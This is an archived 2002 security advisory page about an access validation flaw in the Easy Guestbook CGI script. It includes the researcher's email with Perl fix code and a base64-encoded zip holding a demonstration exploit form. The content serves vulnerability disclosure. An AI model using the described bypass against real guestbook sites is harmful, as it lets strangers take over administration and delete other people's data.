SecurityTracker.com Archives - Easy Guestbook CGI Script Access Validation Flaw Gives Remote Users Administrative Access

	Keep Track of the Latest Vulnerabilities with SecurityTracker!

SecurityTracker
Archives

Sign Up

Instant Alerts

Buy our Premium Vulnerability Notification Service to receive customized, instant alerts

Affiliates

Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!

Report a Bug

Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com

Questions?

Want to learn about SecurityTracker? We've got answers to frequently asked questions right here

Category: Application (Generic) > Easy Guestbook

Vendors: Easy Scripts Archive

Easy Guestbook CGI Script Access Validation Flaw Gives Remote Users Administrative Access

SecurityTracker Alert ID: 1004864

CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)

Date: Jul 28 2002

Impact: Modification of user information, User access via network

Exploit Included: Yes

Version(s): 1.0

Description: A vulnerability was reported in the Easy Guestbook CGI script. A remote user can gain administrative privileges in the Guestbook application.

According to the report, several functions fail to perform access validation. A remote user can login with administrator privileges, change the configuration, and delete guest book entries.

A demonstration exploit is provided in the Source Message (it is a Base64-encoded zip file).

The vendor has reportedly been notified.

Impact: A remote user can gain administrative access to the application.

Solution: No solution was available at the time of this entry.

Vendor URL: www.easyscripts.co.uk/guestbook_index.htm (Links to External Site)

Cause: Access control error

Underlying OS: Linux (Any), UNIX (Any), Windows (Any)

Reported By: Arek Suroboyo <ar3su@yahoo.com>

Message History: None.

Source Message Contents

Date: Sat, 27 Jul 2002 12:58:55 -0700 (PDT)
From: Arek Suroboyo <ar3su@yahoo.com>
Subject: Easy Guestbook Vulnerabilities

 

--0-424191439-1027799935=:6080
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

AresU Advisory 
19/July/2002 

Easy Guestbook Vulnerabilities 

Severity        : High (Possible to edit member
homepage) 
Systems Affected: Easy Guestbook v1.0 
Vendor URL      : http://www.easyscripts.co.uk 
Vuln Type       : It does not use Access Validation to
delete the entries and login as Admin Control. 
Author          : AresU 
Greetz to       : Bosen, Tioeuy, eF73, SakitJiwa,
nimdA, Br0374l, FreshFirst, Algorithm, Mr.Padang 
Adv.URL         :
http://bosen.net/advisories/aresu-adv.002.txt

Summary 
======= 
1) Everyone can delete the entries and login as Admin
Control. 
2) Everyone can reconfigure Guestbook when they open
config.cgi and change Admin Password. 

Solution 
======== 
1) Add Access Validation on "delete_message" function
and "start" function. 

   Add admin.cgi with this code: 
   sub login_verify 
   { 
        chomp($FORM{'login_username'}); 
        chomp($FORM{'login_password'}); 
        if (!($FORM{'login_username'} eq $username &&
$FORM{'login_password'} eq $password)) 
        { 
          dienice("Sorry, but you have entered an
invalid username or password.  Please press the 'back'
button on your browser to return to the Login
Screen."); 
        } 
   } 
  
   And on the first line of "delete_message" function
and "start" function add this: 
   &login_verify; 

   And on the "start" function add this code in the
<FORM>: 
   <input type="hidden" name="login_username"
value="$FORM{'login_username'}"> 
   <input type="hidden" name="login_password"
value="$FORM{'login_password'}"> 
   
2) Delete config.cgi after you finish configure the
Guestbook.   


Acknowledgments 
=============== 
Vulnerability discovery, exploit code, and advisory by
AresU 

Vendor Response 
=============== 
Vendor has been contacted for about 10 days but they
still didn't fix yet. 

Exploit Code 
============ 
Change action in the html form.


__________________________________________________
Do You Yahoo!?
Yahoo! Health - Feel better, live better
http://health.yahoo.com
--0-424191439-1027799935=:6080
Content-Type: application/x-zip-compressed; name="easyguestbook.zip"
Content-Transfer-Encoding: base64
Content-Description: easyguestbook.zip
Content-Disposition: attachment; filename="easyguestbook.zip"

UEsDBBQAAAAIAI8S/CyEH+FLWgIAABgEAAASAAAAZWFzeWd1ZXN0Ym9vay5o
dG1sdVPbbtswDH33V3DeywY4ttthWOelAdL1ghW9YU0L7KmQLSYWIkuGRCV1
v36042xY0elFEi0eHvIcT99NJhCdCd/BRUBPpbVreAzaoBOl0ooUeoiiU0EI
wyrgMugODr4mcJjnhxDd4wadoq7/dI1ShQY+3FnvVakRyIJEjZxMNQIacoz3
kZM6T9h4mC+XWBHKAiIY1ysum4M0ZwKPaKR18PDzqoCaqC2ybLvdpsiPfeVU
Sz6tbBrWEPXkYdG1yHx+EEjLDRhLEDzCvKrQe3gUWklBypq3CYIwErRdKQOC
OcqGD98tf7M6hWgeqGYqwyzmDv0DRBcOkV56sAJOrEeTwEJZDF0CeP7lUwL3
Yq3oUm1FAkY1cp7AOWfW58p5SmCuV5ZHWDcJXLv0TkhhVlxHblLud6gztlz2
2KlByoTcKG97splgpDDhQMp6pPRM0aJWHrwNrkKorETg65IpowzV0LbQ0AbX
Mhrc3lz9iiaTGc94WlOj+TAtrez6vT6YvaXGK3tMM37Hr7lCAw3ycORxfHd7
v4hBVH2143ikv1F8b7LVHo674NGm1UrFDHC60+HGpmCXcDZKwaP/U76AqTJt
ICCW9zgmfKYYNkIHvsRgRMP7MpihaAxevfD9M0P/k+VD2ai/eWPVa/aFWOEe
ZeeJp2Yf9dTpHpxNMOlxCzjIW/oGQ2ApGqW7Avg/YOXEGN2iWtVUQGm1jGfT
0s2mteM2b1s0O08pT27nwv91+IrriajWvcmG7D3VkoNPZJ/ELjgyray2roD3
R3meH+VvUmLJsl6z4bCXPBs98BtQSwECFAAUAAAACACPEvwshB/hS1oCAAAY
BAAAEgAAAAAAAAABACAAtoEAAAAAZWFzeWd1ZXN0Ym9vay5odG1sUEsFBgAA
AAABAAEAQAAAAIoCAAAAAA==

--0-424191439-1027799935=:6080--

Go to the Top of This SecurityTracker Archive Page

Home | View Topics | Search | Contact Us | Help
Copyright 2002, SecurityGlobal.net LLC